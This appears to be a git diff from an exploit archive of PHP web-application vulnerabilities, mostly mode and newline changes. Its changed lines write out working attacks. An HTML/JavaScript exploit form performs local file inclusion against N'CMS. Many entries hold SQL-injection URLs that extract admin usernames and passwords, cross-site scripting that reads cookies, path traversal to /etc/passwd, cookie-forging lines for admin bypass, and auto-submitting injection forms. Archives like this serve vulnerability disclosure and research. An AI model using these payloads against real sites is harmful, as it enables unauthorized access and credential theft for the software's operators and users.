#FFFFFF; background-color: #000000" value="/path/template/theme1/content/"> file: <input type="text" name="file" size="20";" style="color: #FFFFFF; background-color: #000000">&nbsp;&nbsp; lfi code:&nbsp; <input type="text" name="file0" size="20";" style="color: #FFFFFF; background-color: #000000" value="..%2F..%2F..%2F..%2F..%2Fboot.ini%00"></p> </p> <center> </p> <p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset" value="reset" name="B2" style="float: left"></p> </form> <p><br> &nbsp;</p> </center> </body> </html> \ No newline at end of file +<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>#####coded by ahmadbady#####</title> <script language="JavaScript"> //=========================================================================== //( #Topic : N'CMS Updated 2010-02-24 //( #Bug type : local file include //( #Download : http://sourceforge.net/projects/n-cms/files/N-CMS%20Equipe/n-cms-equipe-V1.1C-Debug.zip/download //( #Advisory : //=========================================================================== //( #Author : ItSecTeam //( #Email : Bug@ITSecTeam.com # //( #Website: http://www.itsecteam.com # //( #Forum : http://forum.ITSecTeam.com # //--------------------------------------------------------------------- var variable1 ="?page=" var variable2 ="?tData[name]=" function it(){ if (xpl.file.value=="includs.php"){ variable1 = variable2; } xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+variable1+xpl.file0.value;xpl.submit(); } </script> </head> <body bgcolor="#FFFFFF"> <p align="left"><font color="#0000FF">N'CMS & N'Games local file include Vulnerability</font></p> <p align="left"><font color="#FF0000">vul1 file:/path/template/theme1/content/body.php</font></p> <p align="left"><font color="#FF0000">vul2 file:/path/template/theme1/content/includs.php</font></p> <p align="left"><font color="#0000FF">-----------------------------------</font></p> <form method="post" name="xpl" onSubmit="it();"> <p align="left"> <font size="2" face="Tahoma"> victim: <input type="text" name="victim" size="20";" style="color: #FFFFFF; background-color: #000000" value="http://127.0.0.1"> path: <input type="text" name="path" size="20";" style="color: #FFFFFF; background-color: #000000" value="/path/template/theme1/content/"> file: <input type="text" name="file" size="20";" style="color: #FFFFFF; background-color: #000000">&nbsp;&nbsp; lfi code:&nbsp; <input type="text" name="file0" size="20";" style="color: #FFFFFF; background-color: #000000" value="..%2F..%2F..%2F..%2F..%2Fboot.ini%00"></p> </p> <center> </p> <p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset" value="reset" name="B2" style="float: left"></p> </form> <p><br> &nbsp;</p> </center> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/33827.txt b/platforms/php/webapps/33827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33830.txt b/platforms/php/webapps/33830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33832.txt b/platforms/php/webapps/33832.txt old mode 100755 new mode 100644 index d08743737..caf96bb26 --- a/platforms/php/webapps/33832.txt +++ b/platforms/php/webapps/33832.txt @@ -10,4 +10,4 @@ An attacker can exploit these issues to gain unauthorized access to the affected Firmware versions prior to TANDBERG Video Communication Server 5.1.1 are vulnerable. -https://www.example.com/helppage.php?page=../../../../etc/passwd%00 \ No newline at end of file +https://www.example.com/helppage.php?page=../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/33833.txt b/platforms/php/webapps/33833.txt old mode 100755 new mode 100644 index d697c9bec..3c153612b --- a/platforms/php/webapps/33833.txt +++ b/platforms/php/webapps/33833.txt @@ -7,4 +7,4 @@ Exploiting these issues can allow an attacker to steal cookie-based authenticati Blog System versions 1.5 and prior are affected. http://www.example.com/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -http://www.example.com/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=[LFI]%00 \ No newline at end of file +http://www.example.com/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=[LFI]%00 \ No newline at end of file diff --git a/platforms/php/webapps/33834.txt b/platforms/php/webapps/33834.txt old mode 100755 new mode 100644 index 5f5fe866b..2a29ac4c8 --- a/platforms/php/webapps/33834.txt +++ b/platforms/php/webapps/33834.txt @@ -4,4 +4,4 @@ Vana CMS is prone to a vulnerability that lets attackers download arbitrary file Exploiting this issue will allow an attacker to view arbitrary files within the context of the application. Information harvested may aid in launching further attacks -http://www.example.com/download.php?filename=File.php \ No newline at end of file +http://www.example.com/download.php?filename=File.php \ No newline at end of file diff --git a/platforms/php/webapps/33835.txt b/platforms/php/webapps/33835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33846.txt b/platforms/php/webapps/33846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33851.txt b/platforms/php/webapps/33851.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33853.txt b/platforms/php/webapps/33853.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33854.txt b/platforms/php/webapps/33854.txt old mode 100755 new mode 100644 index 0cd584ffb..fb3df2d10 --- a/platforms/php/webapps/33854.txt +++ b/platforms/php/webapps/33854.txt @@ -4,4 +4,4 @@ Two-Step External Link module for vBulletin is prone to a cross-site scripting v An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/externalredirect.php?url=XSS \ No newline at end of file +http://www.example.com/externalredirect.php?url=XSS \ No newline at end of file diff --git a/platforms/php/webapps/33856.txt b/platforms/php/webapps/33856.txt old mode 100755 new mode 100644 index d638d535c..932c97b70 --- a/platforms/php/webapps/33856.txt +++ b/platforms/php/webapps/33856.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The following example URI is available: -http://www.example.com/forum/view_topic.php?cat=1+union+select+1,concat(aUsername,0x3a,apassword),3,4,5,6,7+from+admins \ No newline at end of file +http://www.example.com/forum/view_topic.php?cat=1+union+select+1,concat(aUsername,0x3a,apassword),3,4,5,6,7+from+admins \ No newline at end of file diff --git a/platforms/php/webapps/33857.txt b/platforms/php/webapps/33857.txt old mode 100755 new mode 100644 index 8a0fb57bd..632257c41 --- a/platforms/php/webapps/33857.txt +++ b/platforms/php/webapps/33857.txt @@ -4,4 +4,4 @@ e107 is prone to an SQL-injection vulnerability because it fails to sufficiently Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -<form action=http://host/e107_admin/banner.php method=POST name=f> <input type=hidden name=createbanner value="Create+New+Banner" > <input type=hidden name=click_url value="' ANY_SQL_HERE " > </form> <script> document.f.submit(); </script> \ No newline at end of file +<form action=http://host/e107_admin/banner.php method=POST name=f> <input type=hidden name=createbanner value="Create+New+Banner" > <input type=hidden name=click_url value="' ANY_SQL_HERE " > </form> <script> document.f.submit(); </script> \ No newline at end of file diff --git a/platforms/php/webapps/33858.txt b/platforms/php/webapps/33858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33867.txt b/platforms/php/webapps/33867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3387.php b/platforms/php/webapps/3387.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33870.txt b/platforms/php/webapps/33870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33874.txt b/platforms/php/webapps/33874.txt old mode 100755 new mode 100644 index 8e2055c7e..bc0750fc8 --- a/platforms/php/webapps/33874.txt +++ b/platforms/php/webapps/33874.txt @@ -15,4 +15,4 @@ http://www.example.com/workarea/medialist.aspx?action=ViewLibraryByCategory&sele URI Redirection issue: -http://www.example.com/workarea/blankredirect.aspx?http://www.example2.com \ No newline at end of file +http://www.example.com/workarea/blankredirect.aspx?http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/33875.txt b/platforms/php/webapps/33875.txt old mode 100755 new mode 100644 index 43ab426fa..bb8d89d15 --- a/platforms/php/webapps/33875.txt +++ b/platforms/php/webapps/33875.txt @@ -9,4 +9,4 @@ Huron CMS 8 11 2007 is vulnerable; other versions may also be affected. The following example data are available: Username: 'or 1=1/* -Password: 'or 1=1/* \ No newline at end of file +Password: 'or 1=1/* \ No newline at end of file diff --git a/platforms/php/webapps/33881.txt b/platforms/php/webapps/33881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33882.txt b/platforms/php/webapps/33882.txt old mode 100755 new mode 100644 index 155dacdc2..9677e54d1 --- a/platforms/php/webapps/33882.txt +++ b/platforms/php/webapps/33882.txt @@ -4,4 +4,4 @@ Cyber CMS is prone to an SQL-injection vulnerability because it fails to suffici Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/faq.php?id=SQL_CODE \ No newline at end of file +http://www.example.com/faq.php?id=SQL_CODE \ No newline at end of file diff --git a/platforms/php/webapps/33883.txt b/platforms/php/webapps/33883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33884.txt b/platforms/php/webapps/33884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33885.txt b/platforms/php/webapps/33885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33888.txt b/platforms/php/webapps/33888.txt old mode 100755 new mode 100644 index 1ee538316..3e9eaf86c --- a/platforms/php/webapps/33888.txt +++ b/platforms/php/webapps/33888.txt @@ -4,4 +4,4 @@ ProArcadeScript is prone to a cross-site scripting vulnerability because it fail An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/search.php?searchstr= [XSS] \ No newline at end of file +http://www.example.com/search.php?searchstr= [XSS] \ No newline at end of file diff --git a/platforms/php/webapps/33889.txt b/platforms/php/webapps/33889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33896.txt b/platforms/php/webapps/33896.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33906.txt b/platforms/php/webapps/33906.txt old mode 100755 new mode 100644 index 915e3253e..9293f0106 --- a/platforms/php/webapps/33906.txt +++ b/platforms/php/webapps/33906.txt @@ -11,4 +11,4 @@ The following example data is available: http://www.example.com/velBox-cms-p30vel/admin/ -javascript:document.cookie="login_admin=true;path=/ \ No newline at end of file +javascript:document.cookie="login_admin=true;path=/ \ No newline at end of file diff --git a/platforms/php/webapps/33908.txt b/platforms/php/webapps/33908.txt old mode 100755 new mode 100644 index 562f1b136..606f5ca99 --- a/platforms/php/webapps/33908.txt +++ b/platforms/php/webapps/33908.txt @@ -8,4 +8,4 @@ The following example data is available : Inject the following into the login options field. -' or 1=1 or ''=' \ No newline at end of file +' or 1=1 or ''=' \ No newline at end of file diff --git a/platforms/php/webapps/33909.txt b/platforms/php/webapps/33909.txt old mode 100755 new mode 100644 index e92259527..5a494ec51 --- a/platforms/php/webapps/33909.txt +++ b/platforms/php/webapps/33909.txt @@ -8,4 +8,4 @@ Tele Data's Contact Management Server 0.9 is vulnerable; other versions may also The following proof-of-concept code is available: -javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit(); \ No newline at end of file +javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit(); \ No newline at end of file diff --git a/platforms/php/webapps/33913.html b/platforms/php/webapps/33913.html old mode 100755 new mode 100644 index 9c010ccb1..1362f8aff --- a/platforms/php/webapps/33913.html +++ b/platforms/php/webapps/33913.html @@ -8,4 +8,4 @@ The attacker may leverage the HTML-injection issue to execute arbitrary HTML and osCommerce 3.0a5 is affected; other versions may also be vulnerable. -http://www.example.com/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../cmd \ No newline at end of file +http://www.example.com/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../cmd \ No newline at end of file diff --git a/platforms/php/webapps/33914.txt b/platforms/php/webapps/33914.txt old mode 100755 new mode 100644 index f6e5cdd6c..9fe25bed7 --- a/platforms/php/webapps/33914.txt +++ b/platforms/php/webapps/33914.txt @@ -9,4 +9,4 @@ Exploiting these issues could allow an attacker to compromise the application, a The following example data is available: User: ' or '1=1 -Pass: ' or '1=1 \ No newline at end of file +Pass: ' or '1=1 \ No newline at end of file diff --git a/platforms/php/webapps/33915.txt b/platforms/php/webapps/33915.txt old mode 100755 new mode 100644 index 789e787d7..6d9598f6d --- a/platforms/php/webapps/33915.txt +++ b/platforms/php/webapps/33915.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Campsite versions 3.2 through 3.3.5 are vulnerable; other versions may also be affected. -http://www.example.com/javascript/tinymce/plugins/campsiteattachment/attachments.php?article_id=0+UNION+SELECT+Id,2,concat%28UName,0x2e,Password%29,4,5,6,7,8,9,10,11,12+FROM+liveuser_users+--+x \ No newline at end of file +http://www.example.com/javascript/tinymce/plugins/campsiteattachment/attachments.php?article_id=0+UNION+SELECT+Id,2,concat%28UName,0x2e,Password%29,4,5,6,7,8,9,10,11,12+FROM+liveuser_users+--+x \ No newline at end of file diff --git a/platforms/php/webapps/33917.txt b/platforms/php/webapps/33917.txt old mode 100755 new mode 100644 index e559a9d14..8d8ffa46a --- a/platforms/php/webapps/33917.txt +++ b/platforms/php/webapps/33917.txt @@ -8,4 +8,4 @@ Billwerx RC5.2.2 PL2 is vulnerable; other versions may also be affected. The following example URI is available: -http://www.example.com/billwerx_rc522_pl2/request_account.php?campaign_id=1&group_id=6&interest_id=6&first_name=indoushka&last_name=indoushka&company_name=indoushka&home_number=indoushka&get_primary=indoushka&work_number=indoushka&mobile_number=indoushka&email_address=indoushka&comments=indoushka&request=REQUEST&close=CLOSE&primary_number=' [(SQL)] \ No newline at end of file +http://www.example.com/billwerx_rc522_pl2/request_account.php?campaign_id=1&group_id=6&interest_id=6&first_name=indoushka&last_name=indoushka&company_name=indoushka&home_number=indoushka&get_primary=indoushka&work_number=indoushka&mobile_number=indoushka&email_address=indoushka&comments=indoushka&request=REQUEST&close=CLOSE&primary_number=' [(SQL)] \ No newline at end of file diff --git a/platforms/php/webapps/33918.txt b/platforms/php/webapps/33918.txt old mode 100755 new mode 100644 index 12264a751..27c6ccc6d --- a/platforms/php/webapps/33918.txt +++ b/platforms/php/webapps/33918.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to upload arbitrary code and run it i CF Image Hosting Script 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/upload.php \ No newline at end of file +http://www.example.com/upload.php \ No newline at end of file diff --git a/platforms/php/webapps/33919.txt b/platforms/php/webapps/33919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33921.txt b/platforms/php/webapps/33921.txt old mode 100755 new mode 100644 index 99b0e8c2b..f91dee74c --- a/platforms/php/webapps/33921.txt +++ b/platforms/php/webapps/33921.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access http://www.example.com/sound.php?catid=2 sql http://www.example.com/details.php?linkid=-7 union select user(),1,2,database(),version(),5,6,7,8-- -http://www.example.com/send.php?linkid=-5 union select user(),1,2,3,4,5,6,7,8-- \ No newline at end of file +http://www.example.com/send.php?linkid=-5 union select user(),1,2,3,4,5,6,7,8-- \ No newline at end of file diff --git a/platforms/php/webapps/33922.txt b/platforms/php/webapps/33922.txt old mode 100755 new mode 100644 index 37d0c5cc9..6e0e65ce0 --- a/platforms/php/webapps/33922.txt +++ b/platforms/php/webapps/33922.txt @@ -7,4 +7,4 @@ An attacker can exploit these vulnerabilities to upload arbitrary code and run i CH-CMS.ch 2 is vulnerable; other versions may also be affected. http://www.example.com/Final/login/ava_up1.php -http://www.example.com/Final/login/ava_up12.php \ No newline at end of file +http://www.example.com/Final/login/ava_up12.php \ No newline at end of file diff --git a/platforms/php/webapps/33925.txt b/platforms/php/webapps/33925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3393.php b/platforms/php/webapps/3393.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33933.txt b/platforms/php/webapps/33933.txt old mode 100755 new mode 100644 index 6d946ef71..1f06517b0 --- a/platforms/php/webapps/33933.txt +++ b/platforms/php/webapps/33933.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ThinkPHP 2.0 is vulnerable; prior versions may also be affected. -http://www.example.com/index.php?s=1%3Cbody+onload=alert(1)%3E \ No newline at end of file +http://www.example.com/index.php?s=1%3Cbody+onload=alert(1)%3E \ No newline at end of file diff --git a/platforms/php/webapps/33934.txt b/platforms/php/webapps/33934.txt old mode 100755 new mode 100644 index f2bb86aad..3da642e02 --- a/platforms/php/webapps/33934.txt +++ b/platforms/php/webapps/33934.txt @@ -24,4 +24,4 @@ javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/ phpMiniSite Script: -javascript:document.cookie="auth=fook; path=/"; \ No newline at end of file +javascript:document.cookie="auth=fook; path=/"; \ No newline at end of file diff --git a/platforms/php/webapps/33945.txt b/platforms/php/webapps/33945.txt old mode 100755 new mode 100644 index f09cafdcf..9f951156f --- a/platforms/php/webapps/33945.txt +++ b/platforms/php/webapps/33945.txt @@ -9,4 +9,4 @@ DeluxeBB 1.3 and earlier versions are vulnerable. The following example data is available: membercookie=guest -memberid=xx',(select+concat(username,0x2e,pass)+from+deluxebb_users+limit+1),'none',0,0,0,0,0,'guest','1269081154')+--+x \ No newline at end of file +memberid=xx',(select+concat(username,0x2e,pass)+from+deluxebb_users+limit+1),'none',0,0,0,0,0,'guest','1269081154')+--+x \ No newline at end of file diff --git a/platforms/php/webapps/33946.txt b/platforms/php/webapps/33946.txt old mode 100755 new mode 100644 index 9389daadb..7b6df19f8 --- a/platforms/php/webapps/33946.txt +++ b/platforms/php/webapps/33946.txt @@ -7,4 +7,4 @@ Attackers can exploit this vulnerability to gain administrative access to the af The following example data is available: www.example.com/admin -javascript:document.cookie="login=right;path=/"; \ No newline at end of file +javascript:document.cookie="login=right;path=/"; \ No newline at end of file diff --git a/platforms/php/webapps/33947.txt b/platforms/php/webapps/33947.txt old mode 100755 new mode 100644 index 66ad4ce4b..c42ae73f9 --- a/platforms/php/webapps/33947.txt +++ b/platforms/php/webapps/33947.txt @@ -4,4 +4,4 @@ Last Wizardz is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/content.php?id=NULL+UNION+ALL+SELECT+1,CONCAT(id,0x3a,admin,0x3a,admin_pass),3,4,5,6,7,8+FROM+site_admin \ No newline at end of file +http://www.example.com/content.php?id=NULL+UNION+ALL+SELECT+1,CONCAT(id,0x3a,admin,0x3a,admin_pass),3,4,5,6,7,8+FROM+site_admin \ No newline at end of file diff --git a/platforms/php/webapps/33950.txt b/platforms/php/webapps/33950.txt old mode 100755 new mode 100644 index 294ab298e..f754dd18a --- a/platforms/php/webapps/33950.txt +++ b/platforms/php/webapps/33950.txt @@ -4,4 +4,4 @@ HAWHAW is prone to an SQL-injection vulnerability because it fails to sufficient Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wap/newsread.php?storyid=-1+UNION+SELECT+1,@@version,3,4 \ No newline at end of file +http://www.example.com/wap/newsread.php?storyid=-1+UNION+SELECT+1,@@version,3,4 \ No newline at end of file diff --git a/platforms/php/webapps/33953.txt b/platforms/php/webapps/33953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33954.txt b/platforms/php/webapps/33954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33957.txt b/platforms/php/webapps/33957.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33960.txt b/platforms/php/webapps/33960.txt old mode 100755 new mode 100644 index 1396de308..93da47882 --- a/platforms/php/webapps/33960.txt +++ b/platforms/php/webapps/33960.txt @@ -10,4 +10,4 @@ The following example URIs are available: http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=15%20or%201=2 -http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2 \ No newline at end of file +http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2 \ No newline at end of file diff --git a/platforms/php/webapps/33967.txt b/platforms/php/webapps/33967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33969.txt b/platforms/php/webapps/33969.txt old mode 100755 new mode 100644 index ebfc9fb01..7a5ccf85d --- a/platforms/php/webapps/33969.txt +++ b/platforms/php/webapps/33969.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc eFront 3.6.2 and prior versions are vulnerable. -http://www.example.com/www/ask_chat.php?chatrooms_ID=0%20UNION%20select%20concat%28login,0x2e,password%29,1,1,1,1%20from%20users%20--%20x \ No newline at end of file +http://www.example.com/www/ask_chat.php?chatrooms_ID=0%20UNION%20select%20concat%28login,0x2e,password%29,1,1,1,1%20from%20users%20--%20x \ No newline at end of file diff --git a/platforms/php/webapps/33970.txt b/platforms/php/webapps/33970.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33972.txt b/platforms/php/webapps/33972.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33975.html b/platforms/php/webapps/33975.html old mode 100755 new mode 100644 index 86fc93094..d1109fbd8 --- a/platforms/php/webapps/33975.html +++ b/platforms/php/webapps/33975.html @@ -4,4 +4,4 @@ Affiliate Store Builder is prone to multiple SQL-injection vulnerabilities becau Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -<form action='http://www.example.com/admin/edit_cms.php?page=1' name="frm" method='post' > <input name="title" type="hidden" value="Home"/> <input name="type" type="hidden" value="header"/> <input name="desc_meta" type="hidden" value="page+desc" /> <input name="desc_key" type="hidden" value='"><script>alert(document.cookie)</script>' /> <input name="cms_id" type="hidden" value="1" /> <input name="edit_page" type="hidden" value="Edit+Page" /> </form> <script> document.frm.submit(); </script> \ No newline at end of file +<form action='http://www.example.com/admin/edit_cms.php?page=1' name="frm" method='post' > <input name="title" type="hidden" value="Home"/> <input name="type" type="hidden" value="header"/> <input name="desc_meta" type="hidden" value="page+desc" /> <input name="desc_key" type="hidden" value='"><script>alert(document.cookie)</script>' /> <input name="cms_id" type="hidden" value="1" /> <input name="edit_page" type="hidden" value="Edit+Page" /> </form> <script> document.frm.submit(); </script> \ No newline at end of file diff --git a/platforms/php/webapps/33976.html b/platforms/php/webapps/33976.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33978.txt b/platforms/php/webapps/33978.txt old mode 100755 new mode 100644 index 8d878d6d7..9737f57c7 --- a/platforms/php/webapps/33978.txt +++ b/platforms/php/webapps/33978.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application, acc TomatoCMS 2.0.6 and prior are vulnerable. -http://www.example.com/news/search?q=sdf%22+ANY_SQL_HERE \ No newline at end of file +http://www.example.com/news/search?q=sdf%22+ANY_SQL_HERE \ No newline at end of file diff --git a/platforms/php/webapps/33979.txt b/platforms/php/webapps/33979.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3398.txt b/platforms/php/webapps/3398.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33982.txt b/platforms/php/webapps/33982.txt old mode 100755 new mode 100644 index a3c5163fa..a48c316fe --- a/platforms/php/webapps/33982.txt +++ b/platforms/php/webapps/33982.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc NPDS Revolution 10.02 is vulnerable; other versions may also be affected. -http://www.example.com/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,1,1%29=char%2848%29%29+DESC-- \ No newline at end of file +http://www.example.com/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,1,1%29=char%2848%29%29+DESC-- \ No newline at end of file diff --git a/platforms/php/webapps/33983.txt b/platforms/php/webapps/33983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33985.txt b/platforms/php/webapps/33985.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33986.txt b/platforms/php/webapps/33986.txt old mode 100755 new mode 100644 index 03045c2f3..3fccdfc38 --- a/platforms/php/webapps/33986.txt +++ b/platforms/php/webapps/33986.txt @@ -4,4 +4,4 @@ PHP File Uploader is prone to a vulnerability that lets attackers upload arbitra An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks may also possible. -http://www.example.com/PHPFileUploader/_uploads/ch99.php__2010-01-02_10.00am.php \ No newline at end of file +http://www.example.com/PHPFileUploader/_uploads/ch99.php__2010-01-02_10.00am.php \ No newline at end of file diff --git a/platforms/php/webapps/33987.txt b/platforms/php/webapps/33987.txt old mode 100755 new mode 100644 index bd60e8139..0839b5818 --- a/platforms/php/webapps/33987.txt +++ b/platforms/php/webapps/33987.txt @@ -6,5 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHP Banner Exchange 1.2 is vulnerable; other versions may also be affected. -http://www.example.com/signupconfirm.php?name=indoushkax&login=hacked&pass=exploit&email=indoushka%40hotmail%2E.com&url=http%3A%2F%2F&bannerurl=<script>alert(213771818860)</script>&submit=%C7%D6%DB%D8%20%E3%D1%C9%20%E6%C7%CD%CF%C9%20%E1%E1%C7%D4%CA%D1%C7%DF - \ No newline at end of file +http://www.example.com/signupconfirm.php?name=indoushkax&login=hacked&pass=exploit&email=indoushka%40hotmail%2E.com&url=http%3A%2F%2F&bannerurl=<script>alert(213771818860)</script>&submit=%C7%D6%DB%D8%20%E3%D1%C9%20%E6%C7%CD%CF%C9%20%E1%E1%C7%D4%CA%D1%C7%DF \ No newline at end of file diff --git a/platforms/php/webapps/33993.txt b/platforms/php/webapps/33993.txt old mode 100755 new mode 100644 index c55f5c3d4..f723e90fa --- a/platforms/php/webapps/33993.txt +++ b/platforms/php/webapps/33993.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Planet Script 1.3 and prior are vulnerable. -http://www.example.com/idomains.php?do=encode&decoded=&ext=[ Xss ] \ No newline at end of file +http://www.example.com/idomains.php?do=encode&decoded=&ext=[ Xss ] \ No newline at end of file diff --git a/platforms/php/webapps/33994.txt b/platforms/php/webapps/33994.txt old mode 100755 new mode 100644 index d337c3092..71e7fb028 --- a/platforms/php/webapps/33994.txt +++ b/platforms/php/webapps/33994.txt @@ -6,4 +6,4 @@ Attackers can exploit this vulnerability to gain administrative access to the af The following example data is available: -javascript:document.cookie="username=admin"; \ No newline at end of file +javascript:document.cookie="username=admin"; \ No newline at end of file diff --git a/platforms/php/webapps/33997.txt b/platforms/php/webapps/33997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33998.html b/platforms/php/webapps/33998.html old mode 100755 new mode 100644 index 79f3d6b4e..c8863f87f --- a/platforms/php/webapps/33998.html +++ b/platforms/php/webapps/33998.html @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to JComments 2.2 are vulnerable. -<form method="POST" action="http://joomla/administrator/index.php" name="main"> <input type="hidden" name="name" value='ComntrName"><script>alert(document.cookie)</script>'> <input type="hidden" name="email" value="example@example.com"> <input type="hidden" name="comment" value="comment text"> <input type="hidden" name="published" value="1"> <input type="hidden" name="option" value="com_jcomments"> <input type="hidden" name="id" value="1"> <input type="hidden" name="task" value="save"> </form> <script> document.main.submit(); </script> \ No newline at end of file +<form method="POST" action="http://joomla/administrator/index.php" name="main"> <input type="hidden" name="name" value='ComntrName"><script>alert(document.cookie)</script>'> <input type="hidden" name="email" value="example@example.com"> <input type="hidden" name="comment" value="comment text"> <input type="hidden" name="published" value="1"> <input type="hidden" name="option" value="com_jcomments"> <input type="hidden" name="id" value="1"> <input type="hidden" name="task" value="save"> </form> <script> document.main.submit(); </script> \ No newline at end of file diff --git a/platforms/php/webapps/33999.txt b/platforms/php/webapps/33999.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34003.txt b/platforms/php/webapps/34003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34004.txt b/platforms/php/webapps/34004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34005.txt b/platforms/php/webapps/34005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34006.txt b/platforms/php/webapps/34006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34007.txt b/platforms/php/webapps/34007.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34008.txt b/platforms/php/webapps/34008.txt old mode 100755 new mode 100644 index 30d265acd..93ebf9621 --- a/platforms/php/webapps/34008.txt +++ b/platforms/php/webapps/34008.txt @@ -12,4 +12,4 @@ com_perchadownloadsattach com_perchagallery com_perchacategoriestree -http://www.example.com/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/34011.txt b/platforms/php/webapps/34011.txt old mode 100755 new mode 100644 index a912cad31..39700ac41 --- a/platforms/php/webapps/34011.txt +++ b/platforms/php/webapps/34011.txt @@ -4,4 +4,4 @@ Shopzilla Affiliate Script PHP is prone to a cross-site scripting vulnerability 